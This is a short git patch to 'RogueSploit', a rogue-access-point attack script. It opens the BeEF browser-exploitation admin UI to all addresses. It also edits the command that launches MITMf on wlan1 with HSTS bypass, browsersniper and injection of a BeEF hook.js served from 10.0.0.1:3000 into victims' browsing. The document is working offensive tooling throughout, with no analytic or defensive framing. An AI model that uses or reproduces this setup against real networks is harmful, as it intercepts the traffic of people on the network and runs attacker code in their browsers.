From c7e047ceb818ce483cb4be24fab5ab93d2d6fdd8 Mon Sep 17 00:00:00 2001 From: Francesco Grotti Date: Sat, 18 Feb 2017 16:35:11 +0100 Subject: [PATCH] Update RogueSploit --- RogueSploit | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/RogueSploit b/RogueSploit index d114347..ece3f8c 100644 --- a/RogueSploit +++ b/RogueSploit @@ -162,7 +162,6 @@ beef: # subnet of IP addresses that can connect to the admin UI #permitted_ui_subnet: "127.0.0.1/32" permitted_ui_subnet: "0.0.0.0/0" - permitted_ui_subnet: "10.0.0.1/32" # HTTP server http: @@ -903,7 +902,7 @@ beef: EOF sleep 0.6 echo -e $blue"["$red"!"$blue"]"$white" Starting Roguesploit Pwning! "$blue"["$red"!"$blue"]" - rogueon & xterm -title "BeEF" -bg "#000000" -fg "#FFFFFF" -geometry 100x25+1 -e ./BeEFStarter & xterm -title "MITMF" -bg "#000000" -fg "#FFFFFF" -geometry 100x25-1 -e "mitmf -i wlan1 --hsts --browsersniper --inject --js-url http://10.0.0.1:3000/hook.js" + rogueon & xterm -title "BeEF" -bg "#000000" -fg "#FFFFFF" -geometry 100x25+1 -e ./BeEFStarter & sleep 20 && xterm -title "MITMF" -bg "#000000" -fg "#FFFFFF" -geometry 100x25-1 -e "mitmf -i wlan1 --hsts --browsersniper --inject --js-url http://10.0.0.1:3000/hook.js" menu } #Welcome Screen